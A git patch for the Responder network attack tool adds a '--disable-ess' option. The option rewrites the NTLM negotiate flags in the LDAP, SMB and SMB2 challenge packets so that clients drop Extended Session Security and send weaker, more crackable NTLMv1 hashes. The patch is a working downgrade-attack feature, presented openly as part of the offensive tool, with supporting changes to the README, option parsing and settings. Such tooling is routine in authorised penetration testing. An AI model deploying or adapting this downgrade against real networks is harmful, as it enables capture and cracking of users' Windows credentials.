From baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516 Mon Sep 17 00:00:00 2001 From: pixis Date: Fri, 14 May 2021 11:45:18 +0200 Subject: [PATCH] Add ESS downgrade parameter --- README.md | 1 + Responder.py | 1 + packets.py | 6 +++--- settings.py | 1 + utils.py | 1 + 5 files changed, 7 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 44a8baa..bc14d7c 100644 --- a/README.md +++ b/README.md @@ -163,6 +163,7 @@ Options: with -r. Default: Off --lm Force LM hashing downgrade for Windows XP/2003 and earlier. Default: Off + --disable-ess Force ESS downgrade. Default: Off -v, --verbose Increase verbosity. diff --git a/Responder.py b/Responder.py index 2b62977..302bdf1 100755 --- a/Responder.py +++ b/Responder.py @@ -43,6 +43,7 @@ parser.add_option('-F','--ForceWpadAuth', action="store_true", help="Force NTLM parser.add_option('-P','--ProxyAuth', action="store_true", help="Force NTLM (transparently)/Basic (prompt) authentication for the proxy. WPAD doesn't need to be ON. This option is highly effective when combined with -r. Default: False", dest="ProxyAuth_On_Off", default=False) parser.add_option('--lm', action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier. Default: False", dest="LM_On_Off", default=False) +parser.add_option('--disable-ess', action="store_true", help="Force ESS downgrade. Default: False", dest="NOESS_On_Off", default=False) parser.add_option('-v','--verbose', action="store_true", help="Increase verbosity.", dest="Verbose") options, args = parser.parse_args() diff --git a/packets.py b/packets.py index 77036bd..4f5acb3 100644 --- a/packets.py +++ b/packets.py @@ -791,7 +791,7 @@ class LDAPNTLMChallenge(Packet): ("NTLMSSPNtWorkstationLen", "\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"), + ("NTLMSSPNtNegotiateFlags", "\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen", "\x94\x00"), @@ -1331,7 +1331,7 @@ class SMBSession1Data(Packet): ("NTLMSSPNtWorkstationLen","\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), + ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen","\x94\x00"), @@ -1651,7 +1651,7 @@ class SMB2Session1Data(Packet): ("NTLMSSPNtWorkstationLen","\x1e\x00"), ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"), ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"), - ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"), + ("NTLMSSPNtNegotiateFlags","\x15\x82\x81\xe2" if settings.Config.NOESS_On_Off else "\x15\x82\x89\xe2"), ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"), ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"), ("NTLMSSPNtTargetInfoLen","\x94\x00"), diff --git a/settings.py b/settings.py index b96f127..3c02527 100644 --- a/settings.py +++ b/settings.py @@ -176,6 +176,7 @@ class Settings: # CLI options self.ExternalIP = options.ExternalIP self.LM_On_Off = options.LM_On_Off + self.NOESS_On_Off = options.NOESS_On_Off self.WPAD_On_Off = options.WPAD_On_Off self.Wredirect = options.Wredirect self.NBTNSDomain = options.NBTNSDomain diff --git a/utils.py b/utils.py index 7a71c83..7045d18 100644 --- a/utils.py +++ b/utils.py @@ -403,6 +403,7 @@ def StartupMessage(): print(' %-27s' % "Force WPAD auth" + (enabled if settings.Config.Force_WPAD_Auth else disabled)) print(' %-27s' % "Force Basic Auth" + (enabled if settings.Config.Basic else disabled)) print(' %-27s' % "Force LM downgrade" + (enabled if settings.Config.LM_On_Off == True else disabled)) + print(' %-27s' % "Force ESS downgrade" + (enabled if settings.Config.NOESS_On_Off == True else disabled)) print(' %-27s' % "Fingerprint hosts" + (enabled if settings.Config.Finger_On_Off == True else disabled)) print('')